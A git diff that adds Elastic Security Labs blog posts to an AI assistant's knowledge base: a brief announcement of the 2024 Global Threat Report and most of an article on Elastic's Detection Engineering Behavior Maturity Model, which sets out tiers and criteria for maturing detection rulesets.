+As excited as we are to begin work on the _next_ Elastic Global Threat Report and review how well we forecasted 2023, it’s been energizing to close out the 2022 calendar year with a few surprises. Defense evasion is still the top tactic for endpoint, credential access is still king of cloud, and malware trends have stayed pretty consistent. [Check it out](https://ela.st/gtr) yourself and learn a little bit about how Elastic’s Canvas technology simplifies visualization.
+
+If you’re attending RSAC 2023 come visit us at booth #5879, and don’t forget to follow @elasticseclabs on Twitter.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_publishes_2024_gtr.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_publishes_2024_gtr.md
new file mode 100644
index 0000000000000..930461295dda8
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_publishes_2024_gtr.md
@@ -0,0 +1,19 @@
+---
+title: "Elastic publishes 2024 Global Threat Report"
+slug: "elastic-publishes-2024-gtr"
+date: "2024-10-01"
+description: "Elastic Security Labs has released the 2024 Elastic Global Threat Report, surfacing the most pressing threats, trends, and recommendations to help keep organizations safe for the upcoming year."
+author:
+  - slug: devon-kerr
+image: "2024-gtr.png"
+category:
+  - slug: reports
+tags:
+  - gtr
+---
+
+*Elastic Security Labs discovers that threat actors are taking advantage of readily available and commonly abused security tools, and misconfigured environments.*
+
+Elastic Security Labs has released the [2024 Elastic Global Threat Report](http://www.elastic.co/blog/elastic-global-threat-2024), surfacing the most pressing threats, trends, and recommendations to help keep organizations safe for the upcoming year. Threat actors are finding success from the use of offensive security tools (OSTs), a misconfiguration of cloud environments, and a growing emphasis on Credential Access. This report explores key telemetry from over a billion data points with emphasis on malware trends, adversary tactics, cloud security, and generative AI curated by Elastic Security Labs.
+
+Read the [announcement](http://www.elastic.co/blog/elastic-global-threat-2024) and [download](https://www.elastic.co/resources/security/report/global-threat-report) the 2024 Elastic Global Threat Report to gain an in-depth understanding of the threat landscape. 
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_releases_debmm.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_releases_debmm.md
new file mode 100644
index 0000000000000..e0348caa59269
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_releases_debmm.md
@@ -0,0 +1,665 @@
+---
+title: "Elastic releases the Detection Engineering Behavior Maturity Model"
+slug: "elastic-releases-debmm"
+date: "2024-09-06"
+subtitle: "Improving detection engineering with Elastic's DEBMM."
+description: "Using this maturity model, security teams can make structured, measurable, and iteritive improvements to their detection engineering teams.."
+author:
+  - slug: mika-ayenson
+  - slug: terrance-dejesus
+  - slug: samir-bousseaden
+image: "debmm.jpg"
+category:
+  - slug: detection-science
+  - slug: security-operations
+tags:
+  - detection engineering
+  - detections as code
+  - debmm
+---
+
+## Detection Engineering Behavior Maturity Model
+
+At Elastic, we believe security is a journey, not a destination. As threats evolve and adversaries become more effective, security teams must continuously adapt and improve their processes to stay ahead of the curve. One of the key components of an effective security program is developing and managing threat detection rulesets. These rulesets are essential for identifying and responding to security incidents. However, the quality and effectiveness of these rulesets are directly influenced by the processes and behaviors of the security team managing them.
+
+To address the evolving challenges in threat detection engineering and ensure consistent improvement across security teams, we have defined the **Detection Engineering Behavior Maturity Model (DEBMM)**. This model, complemented by other models and frameworks, provides a structured approach for security teams to consistently mature their processes and behaviors. By focusing on the team's processes and behaviors, the model ensures that detection rulesets are developed, managed, and improved effectively, regardless of the individual or the specific ruleset in question. This approach promotes a culture of continuous improvement and consistency in threat detection capabilities.
+
+![Detection Engineering Behavior Maturity Model](/assets/images/elastic-releases-debmm/image5.png "Detection Engineering Behavior Maturity Model")
+
+The Detection Engineering Behavior Maturity Model outlines five maturity tiers (Foundation, Basic, Intermediate, Advanced, and Expert) for security teams to achieve. Each tier builds upon the previous one, guiding teams through a structured and iterative process of enhancing their behaviors and practices. While teams may demonstrate behaviors at different tiers, skipping or deprioritizing criteria at the prior tiers is generally not recommended. Consistently meeting the expectations at each tier is crucial for creating a solid foundation for progression. However, measuring maturity over time becomes challenging as threats and technologies evolve, making it difficult to define maturity in an evergreen way. This model emphasizes continuous improvement rather than reaching a fixed destination, reflecting the ongoing nature of security work. 
+
+Note it is possible, and sometimes necessary, to attempt the behaviors of a higher tier in addition to the behaviors of your current tier. For example, attempting to enhance Advanced TTP Coverage may cover an immediate risk or threat, further cultivating expertise among engineers at the basic level.  This flexibility ensures that security teams can prioritize critical improvements and adapt to evolving threats without feeling constrained by the need to achieve perfection at each level. The dual dimensions of maturity ensure a balanced approach, fostering a culture of ongoing enhancement and adaptability. Additionally, the model is designed to complement well-adopted frameworks in the security domain, adding unique value by focusing on the maturity of the team's processes and behaviors that underpin effective detection ruleset management. 
+
+|                       Model/Framework                       |                                                  Focus                                                 |                                                                                                                                                 Contribution of the DEBMM                                                                                                                                                |
+|:-----------------------------------------------------------:|:------------------------------------------------------------------------------------------------------:|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|
+| Hunting Maturity Model [[REF](https://www.sans.org/tools/hunting-maturity-model/)]                                | Proactive threat hunting practices and processes for improving threat detection capabilities.          | Enhances the proactive aspects by integrating regular and systematic threat-hunting activities into the ruleset development and management process.                                                                                                                                                                      |
+| NIST Cybersecurity Framework (NIST CSF) [[REF](https://www.nist.gov/cyberframework)]               | Identifying, Protecting, Detecting, Responding, and Recovering from cybersecurity threats.             | Enhances the 'Detect' function by offering a structured model specifically for detection ruleset maturity, aligning with NIST CSF's core principles and providing detailed criteria and measures for detection capabilities. It also leverages the Maturity Levels—initial, Repeatable, Defined, Managed, and Optimized. |
+| MITRE ATT&CK Framework [[REF](https://attack.mitre.org/)]                                | Describes common tactics, techniques, and procedures (TTPs) threat actors use.                         | Supports creating, tuning, and validating detection rules that align with TTPs, ensuring comprehensive threat coverage and effective response mechanisms.                                                                                                                                                                |
+| ISO/IEC 27001 [[REF](https://www.iso.org/obp/ui/en/#iso:std:iso-iec:27001:ed-3:v1:en)]                                         | Information security management systems (ISMS) and overall risk management.                            | Contributes to the 'Detect' and 'Respond' domains by ensuring detection rules are systematically managed and continuously improved as part of an ISMS.                                                                                                                                                                   |
+| SIM3 v2 – Security Incident Management Maturity Model [[REF](https://opencsirt.org/wp-content/uploads/2023/11/SIM3_v2_interim_standard.pdf)] | Maturity of security incident management processes.                                                    | Integrates structured incident management practices into detection ruleset management, ensuring clear roles, documented procedures, effective communication, and continuous improvement.                                                                                                                                 |
+| Detection Engineering Maturity Matrix [[REF](https://detectionengineering.io)]                 | Defines maturity levels for detection engineering, focusing on processes, technology, and team skills. | Provides behavioral criteria and a structured approach to improving detection engineering processes.                                                                                                                                                                                                                     |
+
+Among the several references listed in the table, the Detection Engineering Maturity Matrix is the closest related, given its goals and methodologies. The matrix defines precise maturity levels for processes, technology, and team skills, while the DEBMM builds on this foundation by emphasizing continuous improvement in engineering behaviors and practices. Together, they offer a comprehensive approach to advancing detection engineering capabilities, ensuring structural and behavioral excellence in managing detection rulesets while describing a common lexicon.
+
+**A Small Note on Perspectives and the Importance of the Model**
+
+Individuals with diverse backgrounds commonly perform detection engineering. People managing detecting engineering processes must recognize and celebrate the value of diverse backgrounds; DEBMM is about teams of individuals, vendors, and users, each bringing different viewpoints to the process. This model lays the groundwork for more robust frameworks to follow, complementing existing ones previously mentioned while considering other perspectives.
+
+### What is a threat detection ruleset?
+
+Before we dive into the behaviors necessary to mature our rulesets, let's first define the term. A threat detection ruleset is a group of rules that contain information and some form of query logic that attempts to match specific threat activity in collected data. These rules typically have a schema, information about the intended purpose, and a query formatted for its specific query language to match threat behaviors. Below are some public examples of threat detection rulesets:
+
+* Elastic:  [Detection Rules](https://github.com/elastic/detection-rules) | [Elastic Defend Rules](https://github.com/elastic/protections-artifacts)
+* Sigma: [Sigma Rules](https://github.com/SigmaHQ/sigma)
+* DataDog: [Detection Rules](https://docs.datadoghq.com/security/detection_rules/)
+* Splunk: [Detections](https://research.splunk.com/detections/)
+* Panther: [Detection Rules](https://github.com/panther-labs/panther-analysis)
+
+Detection rulesets often fall between simple Indicator of Compromise (IOC) matching and programmable detections, such as those written in Python for Panther. They balance flexibility and power, although they are constrained by the detection scripting language's design biases and the detection engine's features. It is important to note that this discussion is focused on search-based detection rules typically used in SIEM (Security Information and Event Management) systems. Other types of detections, including on-stream and machine learning-based detections, can complement SIEM rules but are not explicitly covered by this model.
+
+Rulesets can be further categorized based on specific criteria. For example, one might assess the Amazon Web Services (AWS) ruleset in Elastic’s Detection Rules repository rather than rules based on all available data sources. Other categories might include all cloud-related rulesets, credential access rulesets, etc.
+
+### Why ruleset maturity is important
+
+**Problem:** It shouldn't matter which kind of ruleset you use; they all benefit from a system that promotes effectiveness and rigor. The following issues are more prominent if you're using an ad-hoc or nonexistent system of maturity:
+
+* SOC Fatigue and Low Detection Accuracy: The overwhelming nature of managing high volumes of alerts, often leading to burnout among SOC analysts, is compounded by low-fidelity detection logic and high false positive (FP) rates, resulting in a high number of alerts that are not actual threats and do not accurately identify malicious activity.
+* Lack of Contextual Information and Poor Documentation: Detection rules that trigger alerts without sufficient contextual information to understand the event's significance or lack of guidance for the course of action, combined with insufficient documentation for detection rules, including their purpose, logic, and expected outcomes.
+* Inconsistent Rule Quality: Variability in the quality and effectiveness of detection rules.
+* Outdated Detection Logic: Detection rules must be updated to reflect the latest threat intelligence and attack techniques.
+* Overly Complex Rules: Detection rules that are too complex, making them difficult to maintain and understand.
+* Lack of Automation: Reliance on manual processes for rule updates, alert triage, and response.
+* Inadequate Testing and Validation: Detection rules must be thoroughly tested and validated before deployment.
+* Inflexible Rulesets: Detection rules that are not adaptable to environmental changes or new attack techniques.
+* Lack of Metrics, Measurement, and Coverage Insights: More metrics are needed to measure the effectiveness, performance, and coverage of detection rules across different areas.
+* Siloed Threat Intelligence: Threat intelligence must be integrated with detection rules, leading to fragmented and incomplete threat detection.
+* Inability to Prioritize New Rule Creation: Without a maturity system, teams might focus on quick wins or more exciting areas rather than what is needed.
+
+**Opportunity:** This model encourages a structured approach to developing, managing, improving, and maintaining quality detection rulesets, helping security teams to:
+
+* Reduce SOC fatigue by optimizing alert volumes and improving accuracy.
+* Enhance detection fidelity with regularly updated and well-tested rules.
+* Ensure consistent and high-quality detection logic across the entire ruleset.
+* Integrate contextual information and threat intelligence for more informed alerting.
+* Automate routine processes to improve efficiency and reduce manual errors.
+* Continuously measure and improve the performance of detection rules.
+* Stay ahead of threats, maintain effective detection capabilities, and enhance their overall security posture.
+
+### Understanding the DEBMM Structure
+
+DEBMM is segmented into **tiers** related to **criteria** to **quantitatively and qualitatively** convey maturity across different **levels**, each contributing to clear progression outcomes. It is designed to guide security teams through a structured set of behaviors to develop, manage, and maintain their detection rulesets.
+
+![DEBMM Tier Structure](/assets/images/elastic-releases-debmm/image2.png "DEBMM Tier Structure")
+
+#### Tiers
+
+The DEBMM employs a multidimensional approach to maturity, encompassing both high-level tiers and granular levels of behaviors within each tier. The first dimension involves the overall maturity tiers, where criteria should be met progressively to reflect overall maturity. The second dimension pertains to the levels of behaviors within each tier, highlighting specific practices and improvements that convey maturity. This structure allows for flexibility and recognizes that maturity can be demonstrated in various ways. The second dimension loosely aligns with the NIST Cybersecurity Framework (CSF) maturity levels (Initial, Repeatable, Defined, Managed, and Optimized), providing a _familiar reference point_ for security teams. For instance, the qualitative behaviors and quantitative measurements within each DEBMM tier mirror the iterative refinement and structured process management advocated by the NIST CSF. By aligning with these principles, the DEBMM ensures that as teams progress through its tiers, they also embody the best practices and structured approach seen in the NIST CSF.
+
+At a high level, the DEBMM consists of five maturity tiers, each building upon the previous one:
+
+1. **Tier 0: Foundation** - No structured approach to rule development and management. Rules are created and maintained ad-hoc, with little documentation, peer review, stakeholder communication, or personnel training.
+2. **Tier 1: Basic** - Establishment of baseline rules, systematic rule management, version control, documentation, regular reviews of the threat landscape, and initial personnel training.
+3. **Tier 2: Intermediate** - Focus on continuously tuning rules to reduce false positives, identifying and documenting gaps, thorough internal testing and validation, and ongoing training and development for personnel.
+4. **Tier 3: Advanced** - Systematic identification and ensuring that legitimate threats are not missed (false negatives), engaging in external validation of rules, covering advanced TTPs, and advanced training for analysts and security experts.
+5. **Tier 4: Expert** - This level is characterized by advanced automation, seamless integration with other security tools, continuous improvement through regular updates and external collaboration, and comprehensive training programs for all levels of security personnel. Proactive threat hunting plays a crucial role in maintaining a robust security posture. It complements the ruleset, enhancing the management process by identifying new patterns and insights that can be incorporated into detection rules. Additionally, although not commonly practiced by vendors, detection development as a post-phase of incident response can provide valuable insights and enhance the overall effectiveness of the detection strategy.
+
+It's ideal to progress through these tiers following an approach that best meets the security team's needs (e.g., sequentially, prioritizing by highest risk, etc.). Progressing through the tiers comes with increased operational costs, and rushing through the maturity model without proper budget and staff can lead to burnout and worsen the situation. Skipping foundational practices in the lower tiers can undermine the effectiveness of more advanced activities in the higher tiers.
+
+Consistently meeting the expectations at each tier ensures a solid foundation for moving to the next level. Organizations should strive to iterate and improve continuously, recognizing that maturity is dynamic. The expert level represents an advanced state of maturity, but it is not the final destination. It requires ongoing commitment and adaptation to stay at that level. Organizations may experience fluctuations in their maturity level depending on the frequency and accuracy of assessments. This is why the focus should be on interactive development and recognize that different maturity levels within the tiers may be appropriate based on the organization's specific needs and resources. 
+
+#### Criteria and Levels
+
+Each tier is broken down into specific criteria that security teams must meet. These criteria encompass various aspects of detection ruleset management, such as rule creation, management, telemetry quality, threat landscape review, stakeholder engagement, and more.
+
+Within each criterion, there are qualitative behaviors and quantitative measurements that define the levels of maturity:
+
+* **Qualitative Behaviors—State of Ruleset:** These subjective assessments are based on the quality and thoroughness of the ruleset and its documentation. They provide a way to evaluate the current state of the ruleset, helping threat researchers and detection engineers **understand and articulate the maturity of their ruleset in a structured manner. While individual perspectives can influence these behaviors and may vary between assessors, they are helpful for initial assessments and for providing detailed insights into the ruleset's state.
+* **Quantitative Measurements - Activities to Maintain State**: These provide a structured way to measure the activities and processes that maintain or improve the ruleset. They are designed to be more reliable for comparing the maturity of different rulesets and help track progress over time. While automation can help measure these metrics consistently, reflecting the latest state of maturity, each organization needs to define the ideal for its specific context. The exercise of determining and calculating these metrics will contribute significantly to the maturity process, ensuring that the measures are relevant and tailored to the unique needs and goals of the security team. Use this model as guidance, but establish and adjust specific calculations and metrics according to your organizational requirements and objectives. 
+
+Similar to Tiers, each level within the qualitative and quantitative measurements builds upon the previous one, indicating increasing maturity and sophistication in the approach to detection ruleset management. The goal is to provide clear outcomes and a roadmap for security teams to systematically and continuously improve their detection rulesets.
+
+#### Scope of Effort to Move from Basic to Expert
+
+Moving from the basic to the expert tier involves a significant and sustained effort. As teams progress through the tiers, the complexity and depth of activities increase, requiring more resources, advanced skills, and comprehensive strategies. For example, transitioning from Tier 1 to Tier 2 involves systematic rule tuning and detailed gap analysis, while advancing to Tier 3 and Tier 4 requires robust external validation processes, proactive threat hunting, and sophisticated automation. This journey demands commitment, continuous learning, and adaptation to the evolving threat landscape.
+
+#### Tier 0: Foundation 
+
+Teams must build a structured approach to rule development and management at the foundational tier. Detection rules may start out being created and maintained ad hoc, with little to no peer review, and often needing proper documentation and stakeholder communication. Threat modeling initially rarely influences the creation and management of detection rules, resulting in a reactive rather than proactive approach to threat detection. Additionally, there may be little to no roadmap documented or planned for rule development and updates, leading to inconsistent and uncoordinated efforts.
+
+Establishing standards for what defines a good detection rule is essential to guiding teams toward higher maturity levels. It is important to recognize that a rule may not be perfect in its infancy and will require continuous improvement over time. This is acceptable if analysts are committed to consistently refining and enhancing the rule. We provide recommendations on what a good rule looks like based on our experience, but organizations must define their perfect rule considering their available capabilities and resources.
+
+Regardless of the ruleset, a rule should include specific fields that ensure its effectiveness and accuracy. Different maturity levels will handle these fields with varying completeness and accuracy. While more content provides more opportunities for mistakes, the quality of a rule should improve with the maturity of the ruleset. For example, a better query with fewer false positives, more descriptions with detailed information, and up-to-date MITRE ATT&CK information are indicators of higher maturity.
+
+By establishing and progressively improving these criteria, teams can enhance the quality and effectiveness of their detection rulesets. Fundamentally, it starts with developing, managing, and maintaining a single rule. Creating a roadmap for rule development and updates, even at the most basic level, can provide direction and ensure that improvements are systematically tracked and communicated. Most fields should be validated against a defined schema to provide consistency. For more details, see the [Example Rule Fields](#Example-Rule-Metadata).
+
+![DEBMM - Tier 0](/assets/images/elastic-releases-debmm/image6.png "DEBMM - Tier 0")
+
+##### Criteria
+
+###### Structured Approach to Rule Development and Management
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No structured approach; rules created randomly without documentation.
+    * Repeatable: Minimal structure; some rules are created with primary documentation.
+    * Defined: Standardized process for rule creation with detailed documentation and alignment with defined schemas.
+    * Managed: Regularly reviewed and updated rules, ensuring consistency and adherence to documented standards, with stakeholder involvement.
+    * Optimized: Continuous improvement based on feedback and evolving threats, with automated rule creation and management processes.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No formal activities for rule creation.
+    * Repeatable: Sporadic creation of rules with minimal oversight or review; less than 20% of rules have complete documentation; less than 10% of rules are aligned with a defined schema; rules created do not undergo any formal approval process.
+    * Defined: Regular creation and documentation of rules, with 50-70% alignment to defined schemas and peer review processes.
+    * Managed: Comprehensive creation and management activities, with 70-90% of rules having complete documentation and formal approval processes.
+    * Optimized: Fully automated and integrated rule creation and management processes, with 90-100% alignment to defined schemas and continuous documentation updates.
+
+###### Creation and Maintenance of Detection Rules
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: Rules created and modified ad hoc, without version control.
+    * Repeatable: Occasional updates to rules, but still need a systematic process.
+    * Defined: Systematic process for rule updates, including version control and regular documentation.
+    * Managed: Regular, structured updates with detailed documentation, version control, and stakeholder communication.
+    * Optimized: Continuous rule improvement with automated updates, comprehensive documentation, and proactive stakeholder engagement.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No formal activities are required to maintain detection rules.
+    * Repeatable: Rules are updated sporadically, with less than 50% of rules reviewed annually; more than 30% of rules have missing or incomplete descriptions, references, or documentation; less than 20% of rules are peer-reviewed; less than 20% of rules include escalation procedures or guides; less than 15% of rules have associated metadata for tracking rule effectiveness and modifications.
+    * Defined: Regular updates with 50-70% of rules reviewed annually; detailed descriptions, references, and documentation for most rules; 50% of rules are peer-reviewed.
+    * Managed: Comprehensive updates with 70-90% of rules reviewed annually; complete descriptions, references, and documentation for most rules; 70% of rules are peer-reviewed.
+    * Optimized: Automated updates with 90-100% of rules reviewed annually; thorough descriptions, references, and documentation for all rules; 90-100% of rules are peer-reviewed and include escalation procedures and guides.
+
+###### Roadmap Documented or Planned
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No roadmap documented or planned for rule development and updates.
+    * Repeatable: A basic roadmap exists for some rules, with occasional updates and stakeholder communication.
+    * Defined: A comprehensive roadmap is documented for most rules, with regular updates and stakeholder involvement.
+    * Managed: Detailed, regularly updated roadmap covering all rules, with proactive stakeholder communication and involvement.
+    * Optimized: Dynamic, continuously updated roadmap integrated into organizational processes, with full stakeholder engagement and alignment with strategic objectives.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No documented roadmap for rule development and updates.
+    * Repeatable: Basic roadmap documented for less than 30% of rules; fewer than two roadmap updates or stakeholder meetings per year; less than 20% of rules have a planned update schedule; no formal process for tracking roadmap progress.
+    * Defined: Roadmap documented for 50-70% of rules; regular updates and stakeholder meetings; 50% of rules have a planned update schedule.
+    * Managed: Comprehensive roadmap for 70-90% of rules; frequent updates and stakeholder meetings; 70% of rules have a planned update schedule and tracked progress.
+    * Optimized: Fully integrated roadmap for 90-100% of rules; continuous updates and proactive stakeholder engagement; 90-100% of rules have a planned update schedule with formal tracking processes.
+
+###### Threat Modeling Performed
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No threat modeling was performed.
+    * Repeatable: Occasional, ad-hoc threat modeling with minimal impact on rule creation without considering data and environment specifics.
+    * Defined: Regular threat modeling with structured processes influencing rule creation, considering data and environment specifics.
+    * Managed: Comprehensive threat modeling integrated into rule creation and updates, with detailed documentation and stakeholder involvement.
+    * Optimized: Continuous, proactive threat modeling with real-time data integration, influencing all aspects of rule creation and management with full stakeholder engagement.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No formal threat modeling activities.
+    * Repeatable: Sporadic threat modeling efforts; less than one threat modeling exercise conducted per year with minimal documentation or impact analysis; threat models are reviewed or updated less than twice a year; less than 10% of new rules are based on threat modeling outcomes, and data and environment specifics are not consistently considered.
+    * Defined: Regular threat modeling efforts; one to two annual exercises with detailed documentation and impact analysis; threat models reviewed or updated quarterly; 50-70% of new rules are based on threat modeling outcomes.
+    * Managed: Comprehensive threat modeling activities; three to four exercises conducted per year with thorough documentation and impact analysis; threat models reviewed or updated bi-monthly; 70-90% of new rules are based on threat modeling outcomes.
+    * Optimized: Continuous threat modeling efforts; monthly exercises with real-time documentation and impact analysis; threat models reviewed or updated continuously; 90-100% of new rules are based on threat modeling outcomes, considering data and environment specifics.
+
+#### Tier 1: Basic
+
+The basic tier involves creating a baseline of rules to cover fundamental threats. This includes differentiating between baseline rules for core protection and other supporting rules. Systematic rule management, including version control and documentation, is established. There is a focus on improving and maintaining telemetry quality and reviewing threat landscape changes regularly. At Elastic, we have always followed a Detections as Code (DAC) approach to rule management, which has helped us maintain our rulesets. We have recently exposed some of our internal capabilities and [documented core DAC principles](https://dac-reference.readthedocs.io/en/latest/) for the community to help improve your workflows.
+
+![DEBMM - Tier 1](/assets/images/elastic-releases-debmm/image8.png "DEBMM - Tier 1")
+
+##### Criteria
+
+**Creating a Baseline**
+
+Creating a baseline of rules involves developing a foundational set of rules to cover basic threats. This process starts with understanding the environment and the data available, ensuring that the rules are tailored to the specific needs and capabilities of the organization. The focus should be on critical tactics such as initial access, execution, persistence, privilege escalation, command & control, and critical assets determined by threat modeling and scope. A baseline is defined as the minimal rules necessary to detect critical threats within these tactics or assets, recognizing that not all techniques may be covered. Key tactics are defined as the initial stages of an attack lifecycle where attackers gain entry, establish a foothold, and escalate privileges to execute their objectives. Major threats are defined as threats that can cause significant harm or disruption to the organization, such as ransomware, data exfiltration, and unauthorized access. Supporting rules, such as Elastic’s Building Block Rules (BBR), help enhance the overall detection capability. 
+
+Given the evolution of SIEM and the integration of Endpoint Detection and Response (EDR) solutions, there is an alternative first step for users who utilize an EDR. Only some SIEM users have an EDR, so this step may only apply to some, but organizations should validate that their EDR provides sufficient coverage of basic TTPs. Once this validation is complete, you may supplement that coverage for specific threats of concern based on your environment. Identify high-value assets and profile what typical host and network behavior looks like for them. Develop rules to detect deviations, such as new software installations or unexpected network connections, to ensure a comprehensive security posture tailored to your needs.
+
+Comprehensive documentation goes beyond basic descriptions to include detailed explanations, investigative steps, and context about each rule. For example, general documentation states the purpose of a rule and its query logic. In contrast, comprehensive documentation provides an in-depth analysis of the rule's intent, the context of its application, detailed steps for investigation, potential false positives, and related rules. Comprehensive documentation ensures that security analysts have all the necessary information to effectively utilize and maintain the rule, leading to more accurate and actionable detections. 
+
+It would begin with an initial context explaining the technology behind the rule, outlining the risks and why the user should care about them, and detailing what the rule does and how it operates. This would be followed by possible investigation steps, including triage, scoping, and detailed investigation steps to analyze the alert thoroughly. A section on false positive analysis also provides steps to identify and mitigate false positives, ensuring the rule's accuracy and reliability. The documentation would also list related rules, including their names and IDs, to provide a comprehensive view of the detection landscape. Finally, response and remediation actions would be outlined to guide analysts in containing, remediating, and escalating the alert based on the triage results, ensuring a swift and effective response to detected threats. Furthermore, a setup guide section would be added to explain any prerequisite setup information needed to properly function, ensuring that users have all the necessary configuration details before deploying the rule.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: A few baseline rules are created to set the foundation for the ruleset.
+    * Repeatable: Some baseline rules were created covering key tactics (initial access, execution, persistence, privilege escalation, and command and control) for well-documented threats.
+    * Defined: Comprehensive baseline rules covering significant threats (e.g., ransomware, data exfiltration, unauthorized access) created and documented.
+    * Managed: Queries and rules are validated against the defined schema that aligns with the security product before release.
+    * Optimized: Continuous improvement and fine-tuning baseline rules with advanced threat modeling and automation.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: 5-10 baseline rules created and documented per ruleset (e.g., AWS S3 ruleset, AWS Lambda ruleset, Azure ruleset, Endpoint ruleset).
+    * Repeatable: More than ten baseline rules are created and documented per ruleset, covering major techniques based on threat modeling (e.g., probability of targeting, data source availability, impact on critical assets); at least 10% of rules go through a diagnostic phase.
+    * Defined: A significant percentage (e.g., 60-70%) baseline of ATT&CK techniques covered per data source​​; 70-80% of rules tested as diagnostic (beta) rules before production; regular updates and validation of rules.
+    * Managed: 90% or more of baseline ATT&CK techniques covered per data source; 100% of rules undergo a diagnostic phase before production; comprehensive documentation and continuous improvement processes are in place.
+    * Optimized: 100% coverage of baseline ATT&CK techniques per data source; automated diagnostic and validation processes for all rules; continuous integration and deployment (CI/CD) for rule updates.
+
+###### Managing and Maintaining Rulesets
+
+A systematic approach to managing and maintaining rules, including version control, documentation, and validation.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No rule management.
+    * Repeatable: Occasional rule processes with some documentation and a recurring release cycle for rules.
+    * Defined: Regular rule management with comprehensive documentation and version control.
+    * Managed: Applies a Detections as Code (schema validation, query validation, versioning, automation, etc.) approach to rule management.
+    * Optimized: Advanced automated processes with continuous weekly rule management and validation; complete documentation and version control for all rules.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No rule management activities.
+    * Repeatable: Basic rule management activities are conducted quarterly; less than 20% of rules have version control.
+    * Defined: Regular rule updates and documentation are conducted monthly; 50-70% of rules have version control and comprehensive documentation.
+    * Managed: Automated processes for rule management and validation are conducted bi-weekly; 80-90% of rules are managed using Detections as Code principles.
+    * Optimized: Advanced automated processes with continuous weekly rule management and validation; 100% of rules managed using Detections as Code principles, with complete documentation and version control.
+
+###### Improving and Maintaining Telemetry Quality
+
+Begin conversations and develop relationships with teams managing telemetry data. This applies differently to various security teams: for vendors, it may involve data from all customers; for SOC or Infosec teams, it pertains to company data; and for MSSPs, it covers data from managed clusters. Having good data sources is crucial for all security teams to ensure the effectiveness and accuracy of their detection rules. This also includes incorporating cyber threat intelligence (CTI) workflows to enrich telemetry data with relevant threat context and indicators, improving detection capabilities. Additionally, work with your vendor and align your detection engineering milestones with their feature milestones to ensure you're utilizing the best tooling and getting the most out of your detection rules. This optional criterion can be skipped if not applicable to internal security teams.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No updates or improvements to telemetry to improve the ruleset.
+    * Repeatable: Occasional manual updates and minimal ad hoc collaboration.
+    * Defined: Regular updates with significant integration and formalized collaboration, including communication with Points of Contact (POCs) from integration teams and initial integration of CTI data.
+    * Managed: Comprehensive updates and collaboration with consistent integration of CTI data, enhancing the contextual relevance of telemetry data and improving detection accuracy.
+    * Optimized: Advanced integration of CTI workflows with telemetry data, enabling real-time enrichment and automated responses to emerging threats.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No telemetry updates or improvements.
+    * Repeatable: Basic manual updates and improvements occurring sporadically; less than 30% of rule types produce telemetry/internal data.
+    * Defined: Regular manual updates and improvements occurring at least once per quarter, with periodic CTI data integration; 50-70% of telemetry data integrated with CTI; initial documentation of enhancements in data quality and rule effectiveness.
+    * Managed: Semi-automated updates with continuous improvements, regular CTI data enrichment, and initial documentation of enhancements in data quality and rule effectiveness; 70-90% of telemetry data integrated with CTI.
+    * Optimized: Fully automated updates and continuous improvements, comprehensive CTI integration, and detailed documentation of enhancements in data quality and rule effectiveness; 100% of telemetry data integrated with CTI; real-time enrichment and automated responses to emerging threats.
+
+###### Reviewing Threat Landscape Changes
+
+Regularly assess and update rules based on changes in the threat landscape, including threat modeling and organizational changes.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No reviews of threat landscape changes.
+    * Repeatable: Occasional reviews with minimal updates and limited threat modeling.
+    * Defined: Regular reviews and updates to ensure rule relevance and effectiveness, incorporating threat modeling.
+    * Managed: Maintaining the ability to adaptively respond to emerging threats and organizational changes, with comprehensive threat modeling and cross-correlation of new intelligence.
+    * Optimized: Continuous monitoring and real-time updates based on emerging threats and organizational changes, with dynamic threat modeling and cross-correlation of intelligence.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No reviews conducted.
+    * Repeatable: Reviews conducted bi-annually, referencing cyber blog sites and company reports; less than 30% of rules are reviewed based on threat landscape changes.
+    * Defined: Comprehensive quarterly reviews conducted, incorporating new organizational changes, documented changes and improvements in rule effectiveness; 50-70% of rules are reviewed based on threat landscape changes.
+    * Managed: Continuous monitoring (monthly, weekly, or daily) of cyber intelligence sources, with actionable knowledge implemented and rules adjusted for new assets and departments; 90-100% of rules are reviewed and updated based on the latest threat intelligence and organizational changes.
+    * Optimized: Real-time monitoring and updates with automated intelligence integration; 100% of rules are continuously reviewed and updated based on dynamic threat landscapes and organizational changes.
+
+###### Driving the Feature with Product Owners
+
+Actively engaging with product owners (internal or external) to ensure that the detection needs are on the product roadmap for things related to the detection rule lifecycle or product limitations impacting detection creation. This applies differently for vendors versus in-house security teams. For in-house security teams, this can apply to custom applications developed internally and engaging with vendors or third-party tooling. This implies beginning to build relationships with vendors (such as Elastic) to make feature requests that assist with their detection needs, especially when action needs to be taken by a third party rather than internally.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No engagement with product owners.
+    * Repeatable: Ad hoc occasional engagement with some influence on the roadmap.
+    * Defined: Regular engagement and significant influence on the product roadmap.
+    * Managed: Structured engagement with product owners, leading to consistent integration of detection needs into the product roadmap.
+    * Optimized: Continuous, proactive engagement with product owners, ensuring that detection needs are fully integrated into the product development lifecycle with real-time feedback and updates.
